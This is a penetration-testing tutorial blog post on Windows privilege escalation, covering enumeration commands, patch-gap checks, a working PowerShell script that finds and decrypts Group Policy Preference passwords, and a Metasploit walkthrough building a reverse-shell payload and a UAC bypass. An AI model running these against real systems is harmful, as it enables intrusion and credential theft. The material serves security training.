
Privilege Escalation - Dhanesh Dodia

Updated: Jul 28, 2019

PRIVILEGE ESCALATION

Today we will talk about techniques for privilege escalation on the Windows operating system.

So what is privilege escalation? A privilege escalation attack takes advantage of programming errors, misconfigurations or design flaws to give the attacker more access to a system or network, and to its data and applications, than their account was granted. For example, an attacker holding "read only" permissions somehow extends them to "read and write". On Windows the usual goal is to go from a standard user account to a local administrator or the SYSTEM account.

Privilege, in an information technology context, is the authority a given account or process has within a computing system or network. The diagram that accompanied this section (not reproduced here) showed this as an upward arrow: the attacker starts as a normal user and climbs toward the most privileged level, the kernel, with administrator and SYSTEM as the usual stops on the way.

Before we start doing privilege escalation, the first thing we need to do is gather information about the system. Let's start with some basic information from the current operating system.

Phase 1

1. The first thing we need to find out is what type of user we are running as. To get this information, type the following command in the terminal:

$whoami

whoami on its own only prints the account name. Also run whoami /priv (the token's privileges) and whoami /groups (group memberships and the integrity level): privileges such as SeImpersonatePrivilege or SeBackupPrivilege are escalation paths in their own right, and the integrity level tells you whether UAC has filtered an administrator token.

2. Now let's find out which OS we are connected to. To get this information, type the following command in the terminal:

$systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

The full systeminfo output is worth saving as well: it also gives the system type (x86 or x64), the domain and the list of installed hotfixes.

3. Now let's find out the hostname of the machine we are connected to. To get this information, type the following command in the terminal:

$hostname

4. Next, list the other user accounts on the box, then look at our own account in more detail. To get this information, type the following command in the terminal:

$net users

net user followed by an account name shows that account's group memberships, password policy and last logon, and net localgroup administrators shows who is already a local administrator.

That is all the basic information we can collect about the user; it tells us which account we have and what permissions it carries at the moment.

Phase 2

In this phase we need to collect information on networking: what the machine is connected to and what rules govern those connections.

1. Let's find out the available network interfaces and the routing table. To get this information, type the following commands in the terminal:

$ipconfig /all

$route print

A second interface or a route into another subnet means the box may be a pivot into a network we could not reach directly.

2. Now let's look at the ARP cache for all interfaces, which shows the hosts this machine has talked to recently. To get this information, type the following command in the terminal:

$arp -a

3. Now let's find out the active network connections. To get this information, type the following command in the terminal:

$netstat -ano

The -o column is the owning process ID, so every listening port can be matched to a process in the task list. Services bound only to 127.0.0.1 are worth noting: they are reachable from the box but were never exposed to the network. The firewall rules are a separate query (netsh advfirewall show allprofiles, and netsh advfirewall firewall show rule name=all) and are not part of the netstat output.

4. Finally we need to look at what is running on the compromised box: scheduled tasks, running processes, started services and installed drivers. Scheduled tasks are listed with the following command; running processes (tasklist /svc), started services (net start) and installed drivers (driverquery) each have their own command:

$schtasks /query /fo LIST /v

Pay attention to the "Run As User" and "Task To Run" fields: a task that runs as SYSTEM from a file or directory our user can write to is an escalation path on its own.
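To tie Phases 1 and 2 together, here is an added PowerShell script (not code from the original post) that runs these checks in one go and pulls out the findings that usually matter most: dangerous token privileges, whether UAC has filtered an administrator token, loopback-only listeners, and scheduled tasks that run as SYSTEM. The set of privileges it flags is my own choice rather than anything the post states, and the commands it wraps (whoami /priv, whoami /groups, net localgroup, driverquery, netsh advfirewall) are standard Windows tools that the steps above name but do not show.

```powershell
# Added example (not part of the original post): a PowerShell enumeration script that
# runs the Phase 1 and Phase 2 checks and pulls out the findings that matter most.
# It only reads system state. The list of "dangerous" privileges below is this
# script's own assumption about what is worth flagging, not something the post states.

$DangerousPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
    'SeRestorePrivilege', 'SeDebugPrivilege', 'SeLoadDriverPrivilege',
    'SeTakeOwnershipPrivilege', 'SeManageVolumePrivilege'
)

function Get-TokenSummary {
    # whoami /priv and /groups in CSV form give one row per privilege / group.
    # The S-1-16-* row is the integrity label; BUILTIN\Administrators (S-1-5-32-544)
    # shows "Group used for deny only" when UAC has filtered the token.
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    [pscustomobject]@{
        User       = (whoami)
        Host       = $env:COMPUTERNAME
        Integrity  = ($groups | Where-Object { $_.SID -like 'S-1-16-*' }).'Group Name'
        AdminGroup = ($groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }).Attributes
        Dangerous  = @($privs | Where-Object { $DangerousPrivileges -contains $_.'Privilege Name' } |
                       ForEach-Object { "$($_.'Privilege Name') ($($_.State))" })
    }
}

function Get-LocalOnlyListeners {
    # netstat -ano: TCP listeners bound to loopback are reachable only from this
    # box, so they are candidates for port forwarding once we have a foothold.
    $pattern = '^\s*TCP\s+(127\.0\.0\.1|\[::1\]):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$'
    netstat -ano | ForEach-Object {
        $m = [regex]::Match($_, $pattern)
        if ($m.Success) {
            $procId = [int]$m.Groups[3].Value
            [pscustomobject]@{
                Port    = [int]$m.Groups[2].Value
                PID     = $procId
                Process = (Get-Process -Id $procId -ErrorAction SilentlyContinue).ProcessName
            }
        }
    }
}

function Get-SystemScheduledTasks {
    # schtasks /query /fo CSV /v repeats its header row once per task folder, so
    # drop rows whose TaskName is literally "TaskName" before filtering.
    schtasks /query /fo CSV /v | ConvertFrom-Csv |
        Where-Object { $_.TaskName -ne 'TaskName' -and $_.'Run As User' -match 'SYSTEM' } |
        Select-Object TaskName, 'Task To Run', 'Run As User', 'Schedule Type'
}

function Invoke-BasicEnum {
    # One object with a property per check; pipe to Format-List, or Export-Clixml to keep a copy.
    [pscustomobject]@{
        OS          = (systeminfo | Select-String '^OS (Name|Version)') -join '; '
        Token       = Get-TokenSummary
        LocalAdmins = @(net localgroup administrators |
                        Where-Object { $_ -and $_ -notmatch '^(Alias name|Comment|Members|-+|The command)' })
        Interfaces  = @(ipconfig /all | Select-String 'IPv4 Address|Default Gateway')
        Routes      = @(route print -4 | Select-String '^\s+\d+\.\d+\.\d+\.\d+')
        Arp         = @(arp -a)
        Listeners   = @(Get-LocalOnlyListeners)
        Firewall    = @(netsh advfirewall show allprofiles state)
        SystemTasks = @(Get-SystemScheduledTasks)
        Services    = @(net start)
        Drivers     = @(driverquery /fo csv | ConvertFrom-Csv |
                        Select-Object 'Module Name', 'Display Name', 'Driver Type')
    }
}

Invoke-BasicEnum | Format-List
```

Format-List prints the nested objects in a compact form; to read one section, keep the result in a variable (for example $e = Invoke-BasicEnum) and look at $e.Token or $e.Listeners directly. A non-empty Dangerous list, or an AdminGroup value of "Group used for deny only", already tells you which direction the next phases should take.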

One quick tip: a very good tool for all of this information gathering is WMIC (Windows Management Instrumentation Command-line). It ships with Windows, so there is nothing to install, although it is deprecated in current Windows releases and the same data is available from PowerShell through Get-CimInstance. Type the following command in the terminal to see which aliases it offers and what information each one gathers:

$wmic /?

The first important thing to look at is the patch level. If the host is badly patched, we may not need to look any further: a missing kernel or service patch with a public exploit is the quickest route to SYSTEM. The following WMIC command lists every installed hotfix with its KB number and install date:

$wmic qfe get Caption,Description,HotFixID,InstalledOn

Now review the output against the known privilege escalation vulnerabilities. The best strategy is to look up public privilege escalation exploits, note the KB number of the patch that fixes each one, and check whether that KB is missing from the list. The install date of the most recent hotfix also tells you how long the box has gone without patching. I have listed resources below that are well worth reading on the subject.
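As an added example (not from the original post), this PowerShell snippet turns the manual KB lookup into a check: it reads the installed hotfixes through Get-HotFix, the cmdlet behind the same Win32_QuickFixEngineering data that wmic qfe reads, and compares them with a table of bulletin-to-KB mappings. The three entries in the table are well-known examples I have added for illustration; verify each against the Microsoft advisory before relying on it and extend the table from the resources you trust.

```powershell
# Added example (not part of the original post): compare installed hotfixes with
# the KB numbers that close well-known local privilege escalation bugs.
# The mapping is illustrative: check every entry against the Microsoft advisory
# before relying on it, and add the bulletins you care about.
$PrivEscPatches = @{
    'MS10-015 (KiTrap0D)'               = 'KB977165'
    'MS15-051 (win32k ClientCopyImage)' = 'KB3045171'
    'MS16-032 (Secondary Logon)'        = 'KB3139914'
}

function Get-InstalledHotfixIds {
    # Get-HotFix wraps Win32_QuickFixEngineering, the class "wmic qfe" reads;
    # both list only updates that register a KB number.
    @(Get-HotFix | ForEach-Object { $_.HotFixID.ToUpper() })
}

function Test-PrivEscPatches {
    # $Installed can be passed in (for example hotfix IDs pasted from wmic qfe
    # output on another box) or read from the local machine.
    param([string[]]$Installed = (Get-InstalledHotfixIds))
    foreach ($entry in ($PrivEscPatches.GetEnumerator() | Sort-Object Key)) {
        [pscustomobject]@{
            Bulletin  = $entry.Key
            Patch     = $entry.Value
            Installed = [bool]($Installed -contains $entry.Value.ToUpper())
        }
    }
}

function Get-DaysSinceLastPatch {
    # How long the box has gone without any update at all.
    $latest = Get-HotFix | Where-Object { $_.InstalledOn } |
              Sort-Object InstalledOn -Descending | Select-Object -First 1
    if ($latest) { (New-TimeSpan -Start $latest.InstalledOn -End (Get-Date)).Days }
}

Test-PrivEscPatches | Format-Table -AutoSize
"Days since most recent hotfix: $(Get-DaysSinceLastPatch)"
```

A missing KB is a lead, not proof: the bulletin must actually apply to this OS version and architecture, and on Windows 10 and later the monthly cumulative updates supersede individual KBs, so there the comparison has to be done on the OS build number rather than on hotfix IDs.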

Phase 3

In this phase we will check out Group Policy Preferences (GPP). If the compromised box is joined to a domain, it is important to look for the Groups.xml file stored in SYSVOL, which is where GPP local-account settings are kept. Any authenticated domain user has read access to SYSVOL. The password in the XML file (the cpassword attribute) is encrypted with AES, but the key is a fixed value that Microsoft publishes in the MS-GPPREF specification on MSDN, so anyone who can read the file can decrypt it. Other preference files in the same tree (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) can carry a cpassword too. To check for this vulnerability, browse the Preferences folder under each policy in SYSVOL:

\\<domain>\SYSVOL\<domain>\Policies\<policy GUID>\Machine\Preferences\Groups\Groups.xml

Open Groups.xml as text and read the cpassword value (and the userName next to it).

Once we have the cpassword value, decrypt it with the published key rather than visiting MSDN each time; the gpp-decrypt tool shipped with Kali does exactly this. Note that MS14-025 (KB2962486) stopped administrators from creating new preferences with passwords, but it did not remove existing ones, so old Groups.xml files still turn up.
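Here is the decryption as an added PowerShell example (not the post's own code): it searches SYSVOL for every preference file that can carry a cpassword, decrypts each with the key from MS-GPPREF, and reports which account it belongs to. The Groups.xml at the bottom is a constructed sample so the decryption can be tested offline; its cpassword value is the one used in the documentation of Kali's gpp-decrypt tool.

```powershell
# Added example (not part of the original post): find and decrypt GPP cpassword values.

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # 32-byte AES key published in the MS-GPPREF specification ("Password Encryption")
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    # GPP strips the Base64 '=' padding; restore it or FromBase64String throws
    $padLen = (4 - $Cpassword.Length % 4) % 4
    $cipher = [Convert]::FromBase64String($Cpassword + ('=' * $padLen))
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $key
    $aes.IV      = New-Object byte[] 16          # all-zero IV, as the spec uses
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    $aes.Dispose()
    [System.Text.Encoding]::Unicode.GetString($plain)   # the password is stored as UTF-16LE
}

function Get-GppPasswordsFromXml {
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    # Any element with a cpassword attribute counts: Groups.xml uses <User>, while
    # Services.xml, ScheduledTasks.xml, Drives.xml and DataSources.xml put the same
    # attribute on their own element names and name the account differently.
    foreach ($node in $Xml.SelectNodes('//*[@cpassword]')) {
        $who = 'userName', 'accountName', 'runAs' |
               ForEach-Object { $node.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1
        [pscustomobject]@{
            Source   = $Source
            Element  = $node.ParentNode.Name
            Account  = $who
            Password = ConvertFrom-GppCpassword $node.GetAttribute('cpassword')
        }
    }
}

function Find-GppPasswords {
    # Any domain user can read SYSVOL; walk every policy for the files that can carry a cpassword.
    param([string]$Domain = $env:USERDNSDOMAIN)
    $files = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path "\\$Domain\SYSVOL\$Domain\Policies" -Recurse -Include $files -ErrorAction SilentlyContinue |
        ForEach-Object { Get-GppPasswordsFromXml -Xml ([xml](Get-Content -Raw $_.FullName)) -Source $_.FullName }
}

# Constructed sample in the Groups.xml layout (attributes trimmed to the ones that matter);
# the cpassword is the public test value from the gpp-decrypt documentation.
$SampleGroupsXml = @'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" userName="LocalAdmin"/>
  </User>
</Groups>
'@

# Offline check against the sample; on a domain-joined box run Find-GppPasswords instead.
Get-GppPasswordsFromXml -Xml ([xml]$SampleGroupsXml) -Source 'sample'
```

The gpp-decrypt documentation gives Local*P4ssword! as the plaintext for that sample cpassword, and the sizes agree: the 43-character value pads to 32 bytes of ciphertext, which holds the 30 bytes of UTF-16LE text plus two bytes of PKCS7 padding. Any account recovered this way is a local account on every machine the policy applies to, so test it with the hostname, not the domain, as the logon domain.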

Phase 4

In this phase we will learn how to bypass UAC with Metasploit.

Once we have exploited the target and have access to the target machine, bypassing UAC starts with obtaining a Meterpreter session. Generate a Meterpreter payload with msfvenom (the IP address is the attacker's, so substitute your own):

1. $msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4457 -f exe -o /root/Desktop/file.exe

2. $msfconsole

3. $use exploit/multi/handler

$set lhost 192.168.0.101

$set lport 4457

$options

4. $set payload windows/meterpreter/reverse_tcp

$options

5. $run

The handler's lhost and lport must match the values baked into the payload in step 1, otherwise the connection never arrives.

Now open a new terminal, change to the directory holding file.exe and start a web server there (on Python 3 the module is http.server, i.e. python3 -m http.server 80):

6. $cd /root/Desktop

$python -m SimpleHTTPServer 80

After running this command, open a browser on the Windows machine and enter the attacker's IP address, http://192.168.0.101/. You will see the list of files on the Kali desktop; download file.exe and run it.

Then go back to the first terminal, where run was executed; you should see the Meterpreter session open.

Now type the following commands:

7. $sessions -i 1

$sysinfo

You will now see the system information of the Windows machine. Run getuid as well and note the user: the bypassuac modules only help when that user is a member of the local Administrators group but the session is running at medium integrity because UAC filtered the token. For a plain standard user there is nothing to bypass, and you need one of the other avenues found in the enumeration phases. Then send the session to the background and, back at the msf prompt, search for the available modules (search is a file search inside Meterpreter, so it has to be run from msfconsole):

$background

$search bypassuac

8. $use exploit/windows/local/bypassuac

$set session 1

$run

$shell

Typing shell drops you into the victim's command prompt in the new, elevated session. whoami /groups there shows "High Mandatory Level" instead of Medium, which is the proof that the bypass worked, and getsystem in that Meterpreter session can then take it to SYSTEM. exploit/windows/local/bypassuac targets older Windows releases; on newer builds try one of the other modules returned by the search, for example bypassuac_fodhelper.
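Added example, not part of the original post: a PowerShell check to run on the target (through shell, or with execute -f powershell.exe in Meterpreter) before picking a bypassuac module. It reads the UAC policy values from the registry and the token's groups and integrity label from whoami /groups, then says whether a UAC bypass is the right tool for this session. The verdict strings are my own wording.

```powershell
# Added example (not part of the original post): is a UAC bypass the right next step?
# A bypassuac module only helps when the account is in the local Administrators
# group, UAC is on, and the token has been filtered to medium integrity.

function Get-UacState {
    # EnableLUA=0 means UAC is off and an admin token is already full.
    # ConsentPromptBehaviorAdmin=0 means elevation is granted without a prompt.
    $p = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = [int]$p.EnableLUA
        ConsentPromptBehaviorAdmin = [int]$p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = [int]$p.PromptOnSecureDesktop
    }
}

function Test-UacBypassApplicable {
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $admin  = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }      # BUILTIN\Administrators
    $label  = $groups | Where-Object { $_.SID -like 'S-1-16-*' }        # integrity label row
    $uac    = Get-UacState
    # S-1-16-8192 = Medium, S-1-16-12288 = High, S-1-16-16384 = System
    $elevated = $label.SID -in 'S-1-16-12288', 'S-1-16-16384'

    $verdict = if (-not $admin) {
        'Not in the local Administrators group: a UAC bypass gains nothing, use another technique'
    } elseif ($elevated) {
        'Already elevated: no bypass needed, try getsystem'
    } elseif ($uac.EnableLUA -eq 0) {
        'UAC is disabled, so the admin token is not filtered: just start a new process as admin'
    } elseif ($admin.Attributes -match 'deny only') {
        'Filtered admin token at medium integrity: the bypassuac modules apply'
    } else {
        'Admin group present but token not filtered as expected: inspect whoami /groups by hand'
    }

    [pscustomobject]@{
        Integrity       = $label.'Group Name'
        AdminAttributes = if ($admin) { $admin.Attributes } else { '(not a member)' }
        UAC             = $uac
        Verdict         = $verdict
    }
}

Test-UacBypassApplicable | Format-List
```

Run it again from the shell opened after the bypass: Integrity should now read High Mandatory Level and the Administrators attributes should no longer say "deny only".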

Author - Dhanesh Dodia & Jenni Patel

Working as a Cyber Security Analyst trainee and researcher in the field of network and web-application penetration testing.

Resources

Final suggestion - This guide is meant to be a "fundamentals" guide for Windows privilege escalation. If you want to truly master the subject you will need to put in a lot of work and research. As with all aspects of pentesting, enumeration is key: the more you know about the target, the more avenues of attack you have and the higher the rate of success.
